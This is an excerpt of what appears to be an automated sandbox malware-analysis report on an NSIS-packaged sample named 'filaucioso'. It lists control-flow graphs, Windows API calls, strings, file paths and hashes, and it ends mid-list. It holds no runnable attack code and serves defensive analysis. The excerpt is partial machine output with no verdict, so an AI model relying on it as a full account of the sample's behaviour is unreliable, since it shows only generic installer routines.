                                                                          • Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58
                                                                        • RegisterClassA.USER32(007A26E0), ref: 0040399E
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039B6
                                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039EB
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403A21
                                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,007A26E0), ref: 00403A4D
                                                                        • GetClassInfoA.USER32(00000000,RichEdit,007A26E0), ref: 00403A5A
                                                                        • RegisterClassA.USER32(007A26E0), ref: 00403A63
                                                                        • DialogBoxParamA.USER32(?,00000000,00403BA7,00000000), ref: 00403A82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: "C:\ProgramData\filaucioso.bat" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\unscorified$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$&z
                                                                        • API String ID: 1975747703-3399212048
                                                                        • Opcode ID: ed29314727cc808b10f8cc7e31e3080169c9493618b27ee180dd19afac0b604b
                                                                        • Instruction ID: 79248491ef2bc55f5e0c4717b820805706146ebb855d4f379394f0877404e8f0
                                                                        • Opcode Fuzzy Hash: ed29314727cc808b10f8cc7e31e3080169c9493618b27ee180dd19afac0b604b
                                                                        • Instruction Fuzzy Hash: 6C61C6B0240640BED610AF659D45F3B3A6CD785749F10813FF985B62E2DB7D9D028B2D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 364 402dc4-402e12 GetTickCount GetModuleFileNameA call 405b86 367 402e14-402e19 364->367 368 402e1e-402e4c call 405fed call 4059cc call 405fed GetFileSize 364->368 369 402ff4-402ff8 367->369 376 402e52 368->376 377 402f37-402f45 call 402d60 368->377 379 402e57-402e6e 376->379 383 402f47-402f4a 377->383 384 402f9a-402f9f 377->384 381 402e70 379->381 382 402e72-402e7b call 4031ea 379->382 381->382 390 402fa1-402fa9 call 402d60 382->390 391 402e81-402e88 382->391 386 402f4c-402f64 call 403200 call 4031ea 383->386 387 402f6e-402f98 GlobalAlloc call 403200 call 402ffb 383->387 384->369 386->384 412 402f66-402f6c 386->412 387->384 410 402fab-402fbc 387->410 390->384 395 402f04-402f08 391->395 396 402e8a-402e9e call 405b41 391->396 400 402f12-402f18 395->400 401 402f0a-402f11 call 402d60 395->401 396->400 415 402ea0-402ea7 396->415 407 402f27-402f2f 400->407 408 402f1a-402f24 call 40643c 400->408 401->400 407->379 411 402f35 407->411 408->407 417 402fc4-402fc9 410->417 418 402fbe 410->418 411->377 412->384 412->387 415->400 416 402ea9-402eb0 415->416 416->400 420 402eb2-402eb9 416->420 421 402fca-402fd0 417->421 418->417 420->400 422 402ebb-402ec2 420->422 421->421 423 402fd2-402fed SetFilePointer call 405b41 421->423 422->400 424 402ec4-402ee4 422->424 427 402ff2 423->427 424->384 426 402eea-402eee 424->426 428 402ef0-402ef4 426->428 429 402ef6-402efe 426->429 427->369 428->411 428->429 429->400 430 402f00-402f02 429->430 430->400
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402DD5
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\filaucioso.bat,00000400), ref: 00402DF1
                                                                          • Part of subcall function 00405B86: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\ProgramData\filaucioso.bat,80000000,00000003), ref: 00405B8A
                                                                          • Part of subcall function 00405B86: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405BAC
                                                                        • GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\ProgramData,C:\ProgramData,C:\ProgramData\filaucioso.bat,C:\ProgramData\filaucioso.bat,80000000,00000003), ref: 00402E3D
                                                                        • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00402F73
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                        • String ID: "C:\ProgramData\filaucioso.bat" $2SQ$6SQ$C:\ProgramData$C:\ProgramData\filaucioso.bat$C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                        • API String ID: 2803837635-2682392949
                                                                        • Opcode ID: 94b22126cedc31872e0daff38852294c1b287d6deb9664b33d13f09b0919ceb0
                                                                        • Instruction ID: 59d678f17646e0847602a4e6c91a81595dbc35b8f9b1ca6258d7792959114811
                                                                        • Opcode Fuzzy Hash: 94b22126cedc31872e0daff38852294c1b287d6deb9664b33d13f09b0919ceb0
                                                                        • Instruction Fuzzy Hash: 0F510971900216AFDB109F64CE89B9E7BB8EB55355F10403BF904B62C1C7BC9E81AB5D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 431 40600f-40601a 432 40601c-40602b 431->432 433 40602d-406043 431->433 432->433 434 406234-406238 433->434 435 406049-406054 433->435 436 406066-406070 434->436 437 40623e-406248 434->437 435->434 438 40605a-406061 435->438 436->437 441 406076-40607d 436->441 439 406253-406254 437->439 440 40624a-40624e call 405fed 437->440 438->434 440->439 442 406083-4060b7 441->442 443 406227 441->443 445 4061d4-4061d7 442->445 446 4060bd-4060c7 442->446 447 406231-406233 443->447 448 406229-40622f 443->448 451 406207-40620a 445->451 452 4061d9-4061dc 445->452 449 4060e1 446->449 450 4060c9-4060cd 446->450 447->434 448->434 456 4060e8-4060ef 449->456 450->449 453 4060cf-4060d3 450->453 457 406218-406225 lstrlenA 451->457 458 40620c-406213 call 40600f 451->458 454 4061ec-4061f8 call 405fed 452->454 455 4061de-4061ea call 405f4b 452->455 453->449 459 4060d5-4060d9 453->459 469 4061fd-406203 454->469 455->469 461 4060f1-4060f3 456->461 462 4060f4-4060f6 456->462 457->434 458->457 459->449 465 4060db-4060df 459->465 461->462 467 4060f8-40611b call 405ed4 462->467 468 40612f-406132 462->468 465->456 481 406121-40612a call 40600f 467->481 482 4061bb-4061bf 467->482 470 406142-406145 468->470 471 406134-406140 GetSystemDirectoryA 468->471 469->457 473 406205 469->473 475 4061b2-4061b4 470->475 476 406147-406155 GetWindowsDirectoryA 470->476 474 4061b6-4061b9 471->474 478 4061cc-4061d2 call 406257 473->478 474->478 474->482 475->474 480 406157-406161 475->480 476->475 478->457 484 406163-406166 480->484 485 40617b-406191 SHGetSpecialFolderLocation 480->485 481->474 482->478 487 4061c1-4061c7 lstrcatA 482->487 484->485 488 406168-40616f 484->488 489 406193-4061ad SHGetPathFromIDListA CoTaskMemFree 485->489 490 4061af 485->490 487->478 492 406177-406179 488->492 489->474 489->490 490->475 492->474 492->485
                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040613A
                                                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,0040514C,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000), ref: 0040614D
                                                                        • SHGetSpecialFolderLocation.SHELL32(0040514C,74DF23A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,0040514C,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000), ref: 00406189
                                                                        • SHGetPathFromIDListA.SHELL32(74DF23A0,Call), ref: 00406197
                                                                        • CoTaskMemFree.OLE32(74DF23A0), ref: 004061A3
                                                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004061C7
                                                                        • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,0040514C,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00000000,00798F00,74DF23A0), ref: 00406219
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 717251189-678998643
                                                                        • Opcode ID: 0051370bde1f20c27e8a119ac75029747f87839255994d0d480becf8ae13498a
                                                                        • Instruction ID: d98bd44868bde6ace230f91b8fcf6596fc401970515ead307cdfb18f28ae641c
                                                                        • Opcode Fuzzy Hash: 0051370bde1f20c27e8a119ac75029747f87839255994d0d480becf8ae13498a
                                                                        • Instruction Fuzzy Hash: EE61F471904111AEDF11AF68CC84B7E3BA49B56314F16817FE903BA2D2C73C49A2CB4E

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 562 401759-40177c call 402b2c call 4059f2 567 401786-401798 call 405fed call 405985 lstrcatA 562->567 568 40177e-401784 call 405fed 562->568 573 40179d-4017a3 call 406257 567->573 568->573 578 4017a8-4017ac 573->578 579 4017ae-4017b8 call 4062f0 578->579 580 4017df-4017e2 578->580 587 4017ca-4017dc 579->587 588 4017ba-4017c8 CompareFileTime 579->588 582 4017e4-4017e5 call 405b61 580->582 583 4017ea-401806 call 405b86 580->583 582->583 590 401808-40180b 583->590 591 40187e-4018a7 call 405114 call 402ffb 583->591 587->580 588->587 593 401860-40186a call 405114 590->593 594 40180d-40184f call 405fed * 2 call 40600f call 405fed call 405709 590->594 604 4018a9-4018ad 591->604 605 4018af-4018bb SetFileTime 591->605 606 401873-401879 593->606 594->578 625 401855-401856 594->625 604->605 608 4018c1-4018cc CloseHandle 604->608 605->608 609 4029c1 606->609 612 4018d2-4018d5 608->612 613 4029b8-4029bb 608->613 611 4029c3-4029c7 609->611 615 4018d7-4018e8 call 40600f lstrcatA 612->615 616 4018ea-4018ed call 40600f 612->616 613->609 622 4018f2-402349 615->622 616->622 626 40234e-402353 622->626 627 402349 call 405709 622->627 625->606 628 401858-401859 625->628 626->611 627->626 628->593
                                                                        APIs
                                                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens,00000000,00000000,00000031), ref: 00401798
                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens,00000000,00000000,00000031), ref: 004017C2
                                                                          • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,Desalinates Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                          • Part of subcall function 00405114: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00798F00,74DF23A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
                                                                          • Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00798F00,74DF23A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
                                                                          • Part of subcall function 00405114: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00798F00,74DF23A0), ref: 00405170
                                                                          • Part of subcall function 00405114: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll), ref: 00405182
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp$C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll$C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens$Call
                                                                        • API String ID: 1941528284-1215119620
                                                                        • Opcode ID: d15347f228c0b4bd8738a051a150b1dc970c713c15b2eeb4a2e68bd68b67128e
                                                                        • Instruction ID: 0c6c4ee3c8c955c352dd186891d8ef18ee81d47802e2f4eda18a4991a1bfe0dc
                                                                        • Opcode Fuzzy Hash: d15347f228c0b4bd8738a051a150b1dc970c713c15b2eeb4a2e68bd68b67128e
                                                                        • Instruction Fuzzy Hash: D841B471900515BACB10BBB5CD46D9F36B9DF45328B20823FF522F20E2D67C8A519A6E

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 629 405114-405129 630 4051df-4051e3 629->630 631 40512f-405141 629->631 632 405143-405147 call 40600f 631->632 633 40514c-405158 lstrlenA 631->633 632->633 635 405175-405179 633->635 636 40515a-40516a lstrlenA 633->636 637 405188-40518c 635->637 638 40517b-405182 SetWindowTextA 635->638 636->630 639 40516c-405170 lstrcatA 636->639 640 4051d2-4051d4 637->640 641 40518e-4051d0 SendMessageA * 3 637->641 638->637 639->635 640->630 642 4051d6-4051d9 640->642 641->640 642->630
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00798F00,74DF23A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
                                                                        • lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00798F00,74DF23A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
                                                                        • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00798F00,74DF23A0), ref: 00405170
                                                                        • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll), ref: 00405182
                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll
                                                                        • API String ID: 2531174081-370000574
                                                                        • Opcode ID: 9951a7e7ddd9ebe88044292c7a15ece840a8b03f7fb7a7f461844e108945fb03
                                                                        • Instruction ID: bffe320471bb4ed621b5b80758aa42b14eae6e2fc0b22327473978c148379bdd
                                                                        • Opcode Fuzzy Hash: 9951a7e7ddd9ebe88044292c7a15ece840a8b03f7fb7a7f461844e108945fb03
                                                                        • Instruction Fuzzy Hash: 06219D71D00518BBDF119FA9CD80ADEBFB9EF05358F10807AF904B6291C6388E418FA8

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 643 402ffb-40300f 644 403011 643->644 645 403018-403021 643->645 644->645 646 403023 645->646 647 40302a-40302f 645->647 646->647 648 403031-40303a call 403200 647->648 649 40303f-40304c call 4031ea 647->649 648->649 653 403052-403056 649->653 654 4031d8 649->654 655 403183-403185 653->655 656 40305c-403082 GetTickCount 653->656 657 4031da-4031db 654->657 658 4031c5-4031c8 655->658 659 403187-40318a 655->659 660 4031e0 656->660 661 403088-403090 656->661 662 4031e3-4031e7 657->662 666 4031ca 658->666 667 4031cd-4031d6 call 4031ea 658->667 659->660 663 40318c 659->663 660->662 664 403092 661->664 665 403095-4030a3 call 4031ea 661->665 668 40318f-403195 663->668 664->665 665->654 677 4030a9-4030b2 665->677 666->667 667->654 675 4031dd 667->675 672 403197 668->672 673 403199-4031a7 call 4031ea 668->673 672->673 673->654 680 4031a9-4031ae call 405c2d 673->680 675->660 679 4030b8-4030d8 call 4064aa 677->679 685 40317b-40317d 679->685 686 4030de-4030f1 GetTickCount 679->686 684 4031b3-4031b5 680->684 687 4031b7-4031c1 684->687 688 40317f-403181 684->688 685->657 689 4030f3-4030fb 686->689 690 403136-403138 686->690 687->668 693 4031c3 687->693 688->657 694 403103-40312e MulDiv wsprintfA call 405114 689->694 695 4030fd-403101 689->695 691 40313a-40313e 690->691 692 40316f-403173 690->692 697 403140-403147 call 405c2d 691->697 698 403155-403160 691->698 692->661 699 403179 692->699 693->660 700 403133 694->700 695->690 695->694 703 40314c-40314e 697->703 702 403163-403167 698->702 699->660 700->690 702->679 704 40316d 702->704 703->688 705 403150-403153 703->705 704->660 705->702
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CountTick$wsprintf
                                                                        • String ID: ... %d%%$s=y
                                                                        • API String ID: 551687249-665027819
                                                                        • Opcode ID: 531ab917d645672a2734b3f0630f897d8eddb27c81774d971505de7d935cfd45
                                                                        • Instruction ID: 7192b2bd781d1e73c4002c8dab31bcfd9076020614228c7b813c8c88a4a42f55
                                                                        • Opcode Fuzzy Hash: 531ab917d645672a2734b3f0630f897d8eddb27c81774d971505de7d935cfd45
                                                                        • Instruction Fuzzy Hash: 63517931901209ABCB10DF65DA44A9F7BBCEF18766F14413BE810BB2D0C7799B41CBA9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 706 406317-406337 GetSystemDirectoryA 707 406339 706->707 708 40633b-40633d 706->708 707->708 709 40634d-40634f 708->709 710 40633f-406347 708->710 712 406350-406382 wsprintfA LoadLibraryExA 709->712 710->709 711 406349-40634b 710->711 711->712
                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
                                                                        • wsprintfA.USER32 ref: 00406367
                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040637B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
